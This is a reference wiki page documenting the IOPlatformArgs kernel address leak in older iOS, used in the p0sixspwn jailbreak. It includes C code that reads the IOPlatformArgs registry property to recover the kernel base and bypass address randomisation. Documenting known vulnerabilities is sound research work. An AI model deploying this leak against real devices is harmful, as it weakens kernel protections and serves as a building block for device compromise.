IOPlatformArgs leak

From The Apple Wiki
(Redirected from IOPlatfromArgs leak)

The IOPlatformArgs vulnerability leaks the kernel base address. Used in p0sixspwn.

static uint32_t
get_kernel_base_boot_args(void)
{
  CFStringRef parameter = CFSTR("IOPlatformArgs");
  CFDataRef data;
  io_service_t platformExpert = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOPlatformExpertDevice"));
  if (platformExpert)
  {
    data = IORegistryEntryCreateCFProperty(platformExpert,
                                           parameter,
                                           kCFAllocatorDefault, 0);
  }
  IOObjectRelease(platformExpert);
  CFIndex bufferLength = CFDataGetLength(data);  
  UInt8 *buffer = malloc(bufferLength);
  CFDataGetBytes(data, CFRangeMake(0,bufferLength), (UInt8*) buffer);
  typedef struct {
    uint32_t deviceTreeP;
    uint32_t bootArgs;
    uint32_t zero;
    uint32_t zero_1;
  } platformArgs;
  platformArgs IOPlatformArgs;
  bcopy(buffer, &IOPlatformArgs, sizeof(IOPlatformArgs));
  return IOPlatformArgs.bootArgs;
}

Once the attacker knows the virtual base, they can use the virt_to_phys macro to see what the physical base is, this way both bases are leaked. This all relies on the IOPlatformArgs bug.